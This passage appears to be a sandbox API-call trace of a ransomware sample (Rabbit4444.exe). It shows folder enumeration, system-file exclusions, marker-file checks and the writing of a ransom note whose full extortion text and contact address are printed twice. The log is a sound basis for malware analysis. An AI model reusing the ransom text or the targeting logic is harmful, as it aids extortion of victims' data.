returned 0xf6430 [0046.558] lstrcpynW (in: lpString1=0x11cef20, lpString2="C:\\Windows10Upgrade\\dll1", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\dll1") returned="C:\\Windows10Upgrade\\dll1" [0046.558] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102b10 | out: hHeap=0xe0000) returned 1 [0046.558] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6428 | out: hHeap=0xe0000) returned 1 [0046.558] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\dll1" | out: lpString1="C:\\Windows10Upgrade\\dll1") returned="C:\\Windows10Upgrade\\dll1" [0046.558] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\dll1", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\dll1\\") returned="C:\\Windows10Upgrade\\dll1\\" [0046.558] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\dll1\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\dll1\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\dll1\\.BFC0E91B00AE8A0620D3" [0046.558] CreateFileW (lpFileName="C:\\Windows10Upgrade\\dll1\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\dll1\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0046.559] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\dll1" | out: lpString1="C:\\Windows10Upgrade\\dll1") returned="C:\\Windows10Upgrade\\dll1" [0046.559] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\dll1", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\dll1\\") returned="C:\\Windows10Upgrade\\dll1\\" [0046.559] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\dll1\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\dll1\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\dll1\\.BFC0E91B00AE8A0620D3" [0046.559] CreateFileW (lpFileName="C:\\Windows10Upgrade\\dll1\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\dll1\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0046.559] ReadFile (in: hFile=0x29c, lpBuffer=0x11ccb08, nNumberOfBytesToRead=0x3d4, lpNumberOfBytesRead=0x11ccb04, lpOverlapped=0x0 | out: lpBuffer=0x11ccb08*, lpNumberOfBytesRead=0x11ccb04*=0x3d4, lpOverlapped=0x0) returned 1 [0046.559] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0x105470 [0046.559] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.559] lstrlenA (lpString="b4 JJ up So Ri VJ zb Gs aV zP xm 6E 9W Y1 vI Np\r\nr8 AZ 3V e2 /2 HZ 3m c7 jm eL tD W+ B4 uf S1 ti\r\nDt sJ m2 cw Jt Ud T8 2Z Xb FK Va Cd 1K fR kD X2\r\nwj Ht G7 BW tA mm +H YT 9R vU I5 y9 eh /F 4J GH\r\n+j x1 qZ 6+ tf 2I zQ Sh PI ei T0 Rt U2 M7 1p wT\r\n9Q VS Zp JM Ua UA Lf YT AB yP nf PD Vf 7J Lg s2\r\nmy bV QN IS Bd XQ DS OB tJ sa Hs 5K uR Nj xr sH\r\nNV pi 1D zP l9 V1 Gq 0k Cn WK Om 0Q /F fm oS 55\r\nH5 Jx Dd zc lS Lm uh 0e Qb fg FR Wl lf 0e zP m6\r\nzz On 3h I+ Ux /I cs 0D bM zU /e lR FE q5 +b 53\r\niW eW Ks Ee ZN qJ gP vb 3c 1n iv O5 y3 ih f3 z4\r\n8y aZ jq Oy +L 13 Oj qv Qr Kd hl 2g SU r3 Mv Sa\r\ntv kF TD DN 70 T/ Cv c3 h0 RE rU vo L/ 21 eN zT\r\nuc 1u J/ Op E3 Rx n9 +n Dl jh Mr +v oh xp sN EI\r\nkA YM 2F bl Vl BZ ti +J 2n pk Vb If jW 1M Ee py\r\nUU YZ 06 k/ RM FR tD DV ro Os f8 Zy Jd 7M hk 12\r\nlY bs A1 FV Ri ks fR 2b Wb 88 wL Zq WG 6v Db PN\r\nQ5 X3 LA mF mv qx 1Z mW G2 6k 3o KJ Vg qW 6M F/\r\nco JP wB ws yb zm p9 zT Ja na kx Wb xY Nc f+ Y+\r\nWJ Kj j7 sB S1 RI KH Fh OB aF +3 FZ b0 XD 4G T0\r\nGK fC Qd q5 Vo Md 4O It Nz V/ Fe Q2 51 db hm vg\r\n4t yn AS Fx QT o= ") returned 1047 [0046.559] lstrlenA (lpString="{{ID}}") returned 6 [0046.559] lstrlenA (lpString=" YOUR FILES ARE ENCRYPTED !!!\r\n\r\nTO DECRYPT, FOLLOW THE INSTRUCTIONS:\r\n\r\nTo recover data you need decrypt tool.\r\n\r\nTo get the decrypt tool you should:\r\n\r\n1.In the letter include your personal ID! Send me this ID in your first email to me!\r\n2.We can give you free test for decrypt few files (NOT VALUE) and assign the price for decryption all files!\r\n3.After we send you instruction how to pay for decrypt tool and after payment you will receive a decryption tool! \r\n4.We can decrypt few files in quality the evidence that we have the decoder.\r\n\r\n\r\n DO NOT TRY TO DO SOMETHING WITH YOUR FILES BY YOURSELF YOU WILL BRAKE YOUR DATA !!! ONLY WE ARE CAN HELP YOU! CONTACT US:\r\n\r\nChina.helper@aol.com \r\n\r\n\r\n ATTENTION !!! THIS IS YOUR PERSONAL ID WICH YOU HAVE TO SEND IN FIRST LETTER:\r\n\r\n{{ID}}\r\n") returned 827 [0046.559] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x74c) returned 0x11ccf0 [0046.559] CloseHandle (hObject=0x29c) returned 1 [0046.560] GetLastError () returned 0x0 [0046.560] lstrlenW (lpString="C:\\Windows10Upgrade\\dll1") returned 24 [0046.560] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.560] FindFirstFileW (in: lpFileName="C:\\Windows10Upgrade\\dll1\\*", lpFindFileData=0x11ce3d0 | out: lpFindFileData=0x11ce3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3757e9, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe32594c0, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe32594c0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102810 [0046.560] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.560] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.560] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0046.560] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0046.560] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x11ce3d0 | out: lpFindFileData=0x11ce3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3757e9, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe32594c0, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe32594c0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.560] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.560] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.560] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0046.560] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0046.560] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0046.560] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x11ce3d0 | out: lpFindFileData=0x11ce3d0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe32594c0, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe32594c0, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe32594c0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0046.560] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.561] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0046.561] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x11ce3d0 | out: lpFindFileData=0x11ce3d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea376b75, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea376b75, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x204c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="cosqueryxp.dll", cAlternateFileName="COSQUE~1.DLL")) returned 1 [0046.561] lstrcmpiW (lpString1="cosqueryxp.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.561] lstrcmpiW (lpString1="cosqueryxp.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.561] lstrcmpiW (lpString1="cosqueryxp.dll", lpString2="Rabbit4444.exe") returned -1 [0046.561] lstrcmpiW (lpString1="cosqueryxp.dll", lpString2=".") returned 1 [0046.561] lstrcmpiW (lpString1="cosqueryxp.dll", lpString2="..") returned 1 [0046.561] lstrcmpiW (lpString1="cosqueryxp.dll", lpString2="windows") returned -1 [0046.561] lstrcmpiW (lpString1="cosqueryxp.dll", lpString2="bootmgr") returned 1 [0046.561] lstrcmpiW (lpString1="cosqueryxp.dll", lpString2="pagefile.sys") returned -1 [0046.561] lstrcmpiW (lpString1="cosqueryxp.dll", lpString2="boot") returned 1 [0046.561] lstrcmpiW (lpString1="cosqueryxp.dll", lpString2="ids.txt") returned -1 [0046.561] lstrcmpiW (lpString1="cosqueryxp.dll", lpString2="NTUSER.DAT") returned -1 [0046.561] lstrcpyW (in: lpString1=0x11cef52, lpString2="cosqueryxp.dll" | out: lpString1="cosqueryxp.dll") returned="cosqueryxp.dll" [0046.561] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\dll1\\cosqueryxp.dll", dwFileAttributes=0x0) returned 1 [0046.561] lstrlenW (lpString="cosqueryxp.dll") returned 14 [0046.561] lstrlenW (lpString="Rabbit4444") returned 10 [0046.561] lstrcmpiW (lpString1="ueryxp.dll", lpString2="Rabbit4444") returned 1 [0046.561] lstrlenW (lpString=".dll") returned 4 [0046.561] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0046.561] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x11ce3d0 | out: lpFindFileData=0x11ce3d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea377ed3, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea377ed3, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x3b0c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="wdscore.dll", cAlternateFileName="")) returned 1 [0046.561] lstrcmpiW (lpString1="wdscore.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.561] lstrcmpiW (lpString1="wdscore.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.562] lstrcmpiW (lpString1="wdscore.dll", lpString2="Rabbit4444.exe") returned 1 [0046.562] lstrcmpiW (lpString1="wdscore.dll", lpString2=".") returned 1 [0046.562] lstrcmpiW (lpString1="wdscore.dll", lpString2="..") returned 1 [0046.562] lstrcmpiW (lpString1="wdscore.dll", lpString2="windows") returned -1 [0046.562] lstrcmpiW (lpString1="wdscore.dll", lpString2="bootmgr") returned 1 [0046.562] lstrcmpiW (lpString1="wdscore.dll", lpString2="pagefile.sys") returned 1 [0046.562] lstrcmpiW (lpString1="wdscore.dll", lpString2="boot") returned 1 [0046.562] lstrcmpiW (lpString1="wdscore.dll", lpString2="ids.txt") returned 1 [0046.562] lstrcmpiW (lpString1="wdscore.dll", lpString2="NTUSER.DAT") returned 1 [0046.562] lstrcpyW (in: lpString1=0x11cef52, lpString2="wdscore.dll" | out: lpString1="wdscore.dll") returned="wdscore.dll" [0046.562] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\dll1\\wdscore.dll", dwFileAttributes=0x0) returned 1 [0046.562] lstrlenW (lpString="wdscore.dll") returned 11 [0046.562] lstrlenW (lpString="Rabbit4444") returned 10 [0046.562] lstrcmpiW (lpString1="dscore.dll", lpString2="Rabbit4444") returned -1 [0046.562] lstrlenW (lpString=".dll") returned 4 [0046.562] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0046.562] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x11ce3d0 | out: lpFindFileData=0x11ce3d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea37926f, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea37926f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0xe9ec8, dwReserved0=0x0, dwReserved1=0x0, cFileName="webservices.dll", cAlternateFileName="WEBSER~1.DLL")) returned 1 [0046.562] lstrcmpiW (lpString1="webservices.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.562] lstrcmpiW (lpString1="webservices.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.562] lstrcmpiW (lpString1="webservices.dll", lpString2="Rabbit4444.exe") returned 1 [0046.562] lstrcmpiW (lpString1="webservices.dll", lpString2=".") returned 1 [0046.562] lstrcmpiW (lpString1="webservices.dll", lpString2="..") returned 1 [0046.562] lstrcmpiW (lpString1="webservices.dll", lpString2="windows") returned -1 [0046.562] lstrcmpiW (lpString1="webservices.dll", lpString2="bootmgr") returned 1 [0046.563] lstrcmpiW (lpString1="webservices.dll", lpString2="pagefile.sys") returned 1 [0046.563] lstrcmpiW (lpString1="webservices.dll", lpString2="boot") returned 1 [0046.563] lstrcmpiW (lpString1="webservices.dll", lpString2="ids.txt") returned 1 [0046.563] lstrcmpiW (lpString1="webservices.dll", lpString2="NTUSER.DAT") returned 1 [0046.563] lstrcpyW (in: lpString1=0x11cef52, lpString2="webservices.dll" | out: lpString1="webservices.dll") returned="webservices.dll" [0046.563] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\dll1\\webservices.dll", dwFileAttributes=0x0) returned 1 [0046.563] lstrlenW (lpString="webservices.dll") returned 15 [0046.563] lstrlenW (lpString="Rabbit4444") returned 10 [0046.563] lstrcmpiW (lpString1="rvices.dll", lpString2="Rabbit4444") returned 1 [0046.563] lstrlenW (lpString=".dll") returned 4 [0046.563] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0046.563] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x11ce3d0 | out: lpFindFileData=0x11ce3d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea37926f, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea37926f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0xe9ec8, dwReserved0=0x0, dwReserved1=0x0, cFileName="webservices.dll", cAlternateFileName="WEBSER~1.DLL")) returned 0 [0046.563] FindClose (in: hFindFile=0x102810 | out: hFindFile=0x102810) returned 1 [0046.563] lstrcpyW (in: lpString1=0x11cef52, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0046.563] CreateFileW (lpFileName="C:\\Windows10Upgrade\\dll1\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\windows10upgrade\\dll1\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x29c [0046.563] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0046.564] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0046.565] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.565] CloseHandle (hObject=0x2a0) returned 1 [0046.565] CloseHandle (hObject=0x29c) returned 1 [0046.566] GetCurrentThreadId () returned 0xe00 [0046.566] RtlInterlockedPopEntrySList (in: ListHead=0xf6410 | out: ListHead=0xf6410) returned 0x0 [0046.566] GetCurrentThreadId () returned 0xe00 [0046.566] WaitForMultipleObjects (nCount=0x0, lpHandles=0x11ce620*=0x0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0xffffffff [0046.566] RtlInterlockedPopEntrySList (in: ListHead=0xf6410 | out: ListHead=0xf6410) returned 0x0 [0046.566] RtlInterlockedFlushSList (in: ListHead=0xf6410 | out: ListHead=0xf6410) returned 0x0 [0046.566] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6408 | out: hHeap=0xe0000) returned 1 [0046.566] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xff798 | out: hHeap=0xe0000) returned 1 [0046.566] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ccf0 | out: hHeap=0xe0000) returned 1 [0046.566] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105470 | out: hHeap=0xe0000) returned 1 [0046.566] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 Thread: id = 15 os_tid = 0x200 [0046.720] RtlInterlockedPopEntrySList (in: ListHead=0xf63f0 | out: ListHead=0xf63f0) returned 0xf6370 [0046.720] lstrcpynW (in: lpString1=0x11ce9e0, lpString2="C:\\Windows10Upgrade\\resources\\i386", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\resources\\i386") returned="C:\\Windows10Upgrade\\resources\\i386" [0046.720] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10b4c0 | out: hHeap=0xe0000) returned 1 [0046.720] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6368 | out: hHeap=0xe0000) returned 1 [0046.721] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\resources\\i386" | out: lpString1="C:\\Windows10Upgrade\\resources\\i386") returned="C:\\Windows10Upgrade\\resources\\i386" [0046.721] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\i386", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\resources\\i386\\") returned="C:\\Windows10Upgrade\\resources\\i386\\" [0046.721] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\i386\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\resources\\i386\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\resources\\i386\\.BFC0E91B00AE8A0620D3" [0046.721] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\resources\\i386\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0046.721] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\resources\\i386" | out: lpString1="C:\\Windows10Upgrade\\resources\\i386") returned="C:\\Windows10Upgrade\\resources\\i386" [0046.721] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\i386", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\resources\\i386\\") returned="C:\\Windows10Upgrade\\resources\\i386\\" [0046.721] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\i386\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\resources\\i386\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\resources\\i386\\.BFC0E91B00AE8A0620D3" [0046.721] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\resources\\i386\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0046.721] ReadFile (in: hFile=0x29c, lpBuffer=0x11cc5c8, nNumberOfBytesToRead=0x3d4, lpNumberOfBytesRead=0x11cc5c4, lpOverlapped=0x0 | out: lpBuffer=0x11cc5c8*, lpNumberOfBytesRead=0x11cc5c4*=0x3d4, lpOverlapped=0x0) returned 1 [0046.721] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0x105510 [0046.721] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.722] lstrlenA (lpString="b4 JJ up So Ri VJ zb Gs aV zP xm 6E 9W Y1 vI Np\r\nr8 AZ 3V e2 /2 HZ 3m c7 jm eL tD W+ B4 uf S1 ti\r\nDt sJ m2 cw Jt Ud T8 2Z Xb FK Va Cd 1K fR kD X2\r\nwj Ht G7 BW tA mm +H YT 9R vU I5 y9 eh /F 4J GH\r\n+j x1 qZ 6+ tf 2I zQ Sh PI ei T0 Rt U2 M7 1p wT\r\n9Q VS Zp JM Ua UA Lf YT AB yP nf PD Vf 7J Lg s2\r\nmy bV QN IS Bd XQ DS OB tJ sa Hs 5K uR Nj xr sH\r\nNV pi 1D zP l9 V1 Gq 0k Cn WK Om 0Q /F fm oS 55\r\nH5 Jx Dd zc lS Lm uh 0e Qb fg FR Wl lf 0e zP m6\r\nzz On 3h I+ Ux /I cs 0D bM zU /e lR FE q5 +b 53\r\niW eW Ks Ee ZN qJ gP vb 3c 1n iv O5 y3 ih f3 z4\r\n8y aZ jq Oy +L 13 Oj qv Qr Kd hl 2g SU r3 Mv Sa\r\ntv kF TD DN 70 T/ Cv c3 h0 RE rU vo L/ 21 eN zT\r\nuc 1u J/ Op E3 Rx n9 +n Dl jh Mr +v oh xp sN EI\r\nkA YM 2F bl Vl BZ ti +J 2n pk Vb If jW 1M Ee py\r\nUU YZ 06 k/ RM FR tD DV ro Os f8 Zy Jd 7M hk 12\r\nlY bs A1 FV Ri ks fR 2b Wb 88 wL Zq WG 6v Db PN\r\nQ5 X3 LA mF mv qx 1Z mW G2 6k 3o KJ Vg qW 6M F/\r\nco JP wB ws yb zm p9 zT Ja na kx Wb xY Nc f+ Y+\r\nWJ Kj j7 sB S1 RI KH Fh OB aF +3 FZ b0 XD 4G T0\r\nGK fC Qd q5 Vo Md 4O It Nz V/ Fe Q2 51 db hm vg\r\n4t yn AS Fx QT o= ") returned 1047 [0046.722] lstrlenA (lpString="{{ID}}") returned 6 [0046.722] lstrlenA (lpString=" YOUR FILES ARE ENCRYPTED !!!\r\n\r\nTO DECRYPT, FOLLOW THE INSTRUCTIONS:\r\n\r\nTo recover data you need decrypt tool.\r\n\r\nTo get the decrypt tool you should:\r\n\r\n1.In the letter include your personal ID! Send me this ID in your first email to me!\r\n2.We can give you free test for decrypt few files (NOT VALUE) and assign the price for decryption all files!\r\n3.After we send you instruction how to pay for decrypt tool and after payment you will receive a decryption tool! \r\n4.We can decrypt few files in quality the evidence that we have the decoder.\r\n\r\n\r\n DO NOT TRY TO DO SOMETHING WITH YOUR FILES BY YOURSELF YOU WILL BRAKE YOUR DATA !!! ONLY WE ARE CAN HELP YOU! CONTACT US:\r\n\r\nChina.helper@aol.com \r\n\r\n\r\n ATTENTION !!! THIS IS YOUR PERSONAL ID WICH YOU HAVE TO SEND IN FIRST LETTER:\r\n\r\n{{ID}}\r\n") returned 827 [0046.722] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x74c) returned 0x11ccf0 [0046.722] CloseHandle (hObject=0x29c) returned 1 [0046.722] GetLastError () returned 0x0 [0046.722] lstrlenW (lpString="C:\\Windows10Upgrade\\resources\\i386") returned 34 [0046.722] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.722] FindFirstFileW (in: lpFileName="C:\\Windows10Upgrade\\resources\\i386\\*", lpFindFileData=0x11cde90 | out: lpFindFileData=0x11cde90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3a9fd3, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe4e7332a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe4e7332a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0046.722] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.722] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.722] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0046.722] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0046.722] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x11cde90 | out: lpFindFileData=0x11cde90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3a9fd3, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe4e7332a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe4e7332a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.722] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.722] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.722] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0046.722] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0046.722] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0046.722] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x11cde90 | out: lpFindFileData=0x11cde90*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe4e7332a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe4e7332a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe4e7332a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0046.722] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.722] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0046.722] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x11cde90 | out: lpFindFileData=0x11cde90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3ab347, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3ab347, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x16600, dwReserved0=0x0, dwReserved1=0x0, cFileName="BiosBlocks.xml", cAlternateFileName="BIOSBL~1.XML")) returned 1 [0046.722] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.722] lstrcmpiW 